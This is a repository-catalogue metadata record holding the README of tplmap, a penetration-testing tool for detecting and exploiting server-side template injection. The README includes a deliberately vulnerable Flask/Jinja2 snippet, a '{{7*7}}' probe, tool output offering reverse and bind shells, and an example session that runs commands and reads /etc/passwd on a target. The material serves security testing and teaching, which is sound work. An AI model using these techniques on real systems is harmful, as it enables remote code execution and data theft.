{"id":13539040,"url":"https://github.com/epinna/tplmap","last_synced_at":"2025-04-12T20:38:49.010Z","repository":{"id":40568382,"uuid":"62751496","full_name":"epinna/tplmap","owner":"epinna","description":"Server-Side Template Injection and Code Injection Detection and Exploitation Tool","archived":false,"fork":false,"pushed_at":"2024-04-21T14:47:13.000Z","size":665,"stargazers_count":3906,"open_issues_count":45,"forks_count":683,"subscribers_count":83,"default_branch":"master","last_synced_at":"2025-04-05T19:07:07.100Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/epinna.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2016-07-06T20:33:18.000Z","updated_at":"2025-04-05T18:10:53.000Z","dependencies_parsed_at":"2024-01-03T04:09:00.607Z","dependency_job_id":"9b81e3b4-eb06-47a2-ada2-e35c32c9b3da","html_url":"https://github.com/epinna/tplmap","commit_stats":null,"previous_names":[],"tags_count":6,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/epinna%2Ftplmap","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/epinna%2Ftplmap/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/epinna%2Ftplmap/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/epinna%2Ftplmap/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/epinna","download_url":"https://codeload.github.com/epinna/tplmap/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248631668,"owners_count":21136554,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T09:01:19.421Z","updated_at":"2025-04-12T20:38:48.993Z","avatar_url":"https://github.com/epinna.png","language":"Python","readme":"Tplmap\n======\n\n\u003e This project is no longer maintained. I'm happy to merge new PRs as long they don't break the [test suite](https://github.com/epinna/tplmap/wiki/Run-the-test-suite).\n\nTplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system.\n\nThe tool and its test suite are developed to research the SSTI vulnerability class and to be used as offensive security tool during web application penetration tests.\n\nThe sandbox break-out techniques came from James Kett's [Server-Side Template Injection: RCE For The Modern Web App][10], other public researches [\\[1\\]][1] [\\[2\\]][2], and original contributions to this tool [\\[3\\]][3] [\\[4\\]][4].\n\nIt can exploit several code context and blind injection scenarios. It also supports _eval()_-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.\n\nServer-Side Template Injection\n------------------------------\n\nAssume that you are auditing a web site that generates dynamic pages using templates composed with user-provided values, such as this web application written in Python and [Flask][12] that uses [Jinja2][11] template engine in an unsafe way.\n\n```python\nfrom flask import Flask, request\nfrom jinja2 import Environment\n\napp = Flask(__name__)\nJinja2 = Environment()\n\n@app.route(\"/page\")\ndef page():\n\n name = request.values.get('name')\n \n # SSTI VULNERABILITY\n # The vulnerability is introduced concatenating the\n # user-provided `name` variable to the template string.\n output = Jinja2.from_string('Hello ' + name + '!').render()\n \n # Instead, the variable should be passed to the template context.\n # Jinja2.from_string('Hello {{name}}!').render(name = name)\n\n return output\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=80)\n```\n\nFrom a black box testing perspective, the page reflects the value similarly to a XSS vulnerability, but also computes basic operation at runtime disclosing its SSTI nature.\n\n```\n$ curl -g 'http://www.target.com/page?name=John'\nHello John!\n$ curl -g 'http://www.target.com/page?name={{7*7}}'\nHello 49!\n```\n\nExploitation\n------------\n\nTplmap is able to detect and exploit SSTI in a range of template engines to get access to the underlying file system and operating system. Run it against the URL to test if the parameters are vulnerable.\n\n```\n$ ./tplmap.py -u 'http://www.target.com/page?name=John'\n[+] Tplmap 0.5\n Automatic Server-Side Template Injection Detection and Exploitation Tool\n\n[+] Testing if GET parameter 'name' is injectable\n[+] Smarty plugin is testing rendering with tag '{*}'\n[+] Smarty plugin is testing blind injection\n[+] Mako plugin is testing rendering with tag '${*}'\n...\n[+] Jinja2 plugin is testing rendering with tag '{{*}}'\n[+] Jinja2 plugin has confirmed injection with tag '{{*}}'\n[+] Tplmap identified the following injection point:\n\n GET parameter: name\n Engine: Jinja2\n Injection: {{*}}\n Context: text\n OS: linux\n Technique: render\n Capabilities:\n\n Shell command execution: ok\n Bind and reverse shell: ok\n File write: ok\n File read: ok\n Code evaluation: ok, python code\n\n[+] Rerun tplmap providing one of the following options:\n\n --os-shell Run shell on the target\n --os-cmd Execute shell commands\n --bind-shell PORT Connect to a shell bind to a target port\n --reverse-shell HOST PORT Send a shell back to the attacker's port\n --upload LOCAL REMOTE Upload files to the server\n --download REMOTE LOCAL Download remote files\n```\n\nUse `--os-shell` option to launch a pseudo-terminal on the target.\n\n```\n$ ./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'\n[+] Tplmap 0.5\n Automatic Server-Side Template Injection Detection and Exploitation Tool\n\n[+] Run commands on the operating system.\n\nlinux $ whoami\nwww\nlinux $ cat /etc/passwd\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\n```\n\nSupported template engines\n--------------------------\n\nTplmap supports over 15 template engines, unsandboxed template engines and generic _eval()_-like injections.\n\n| Engine | Remote Command Execution | Blind | Code evaluation | File read | File write |\n|------------------------|---------------|-------------------|-----------------|-----------|------------|\n| Mako | ✓ | ✓ | Python | ✓ | ✓ |\n| Jinja2 | ✓ | ✓ | Python | ✓ | ✓ |\n| Python (code eval) | ✓ | ✓ | Python | ✓ | ✓ |\n| Tornado | ✓ | ✓ | Python | ✓ | ✓ |\n| Nunjucks | ✓ | ✓ | JavaScript | ✓ | ✓ |\n| Pug | ✓ | ✓ | JavaScript | ✓ | ✓ |\n| doT | ✓ | ✓ | JavaScript | ✓ | ✓ |\n| Marko | ✓ | ✓ | JavaScript | ✓ | ✓ |\n| JavaScript (code eval) | ✓ | ✓ | JavaScript | ✓ | ✓ |\n| Dust (\u003c= dustjs-helpers@1.5.0) | ✓ | ✓ | JavaScript | ✓ | ✓ |\n| EJS | ✓ | ✓ | JavaScript | ✓ | ✓ |\n| Ruby (code eval) | ✓ | ✓ | Ruby | ✓ | ✓ |\n| Slim | ✓ | ✓ | Ruby | ✓ | ✓ |\n| ERB | ✓ | ✓ | Ruby | ✓ | ✓ |\n| Smarty (unsecured) | ✓ | ✓ | PHP | ✓ | ✓ |\n| PHP (code eval) | ✓ | ✓ | PHP | ✓ | ✓ |\n| Twig (\u003c=1.19) | ✓ | ✓ | PHP | ✓ | ✓ |\n| Freemarker | ✓ | ✓ | Java | ✓ | ✓ |\n| Velocity | ✓ | ✓ | Java | ✓ | ✓ |\n| Twig (\u003e1.19) | × | × | × | × | × |\n| Smarty (secured) | × | × | × | × | × |\n| Dust (\u003e dustjs-helpers@1.5.0) | × | × | × | × | × |\n\n\nBurp Suite Plugin\n-----------------\n\nSee [burp_extension/README.md](burp_extension/README.md).\n\n[10]: http://blog.portswigger.net/2015/08/server-side-template-injection.html\n[3]: https://github.com/epinna/tplmap/issues/9\n[4]: http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine\n[1]: https://artsploit.blogspot.co.uk/2016/08/pprce2.html\n[11]: http://jinja.pocoo.org/\n[12]: http://flask.pocoo.org/\n[2]: https://opsecx.com/index.php/2016/07/03/server-side-template-injection-in-tornado/\n","funding_links":[],"categories":["Tools","\u003ca id=\"683b645c2162a1fce5f24ac2abfa1973\"\u003e\u003c/a\u003e漏洞\u0026\u0026漏洞管理\u0026\u0026漏洞发现/挖掘\u0026\u0026漏洞开发\u0026\u0026漏洞利用\u0026\u0026Fuzzing","Exploitation","Weapons","Python (1887)","Python","红队\u0026渗透测试","Web Exploitation","Web"],"sub_categories":["Offensive","Web Exploitation","\u003ca id=\"41ae40ed61ab2b61f2971fea3ec26e7c\"\u003e\u003c/a\u003e漏洞利用","SSTI Injection","Tools","Web injection tools","Web Injection Tools","Penetration Testing Report Templates"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fepinna%2Ftplmap","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fepinna%2Ftplmap","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fepinna%2Ftplmap/lists"}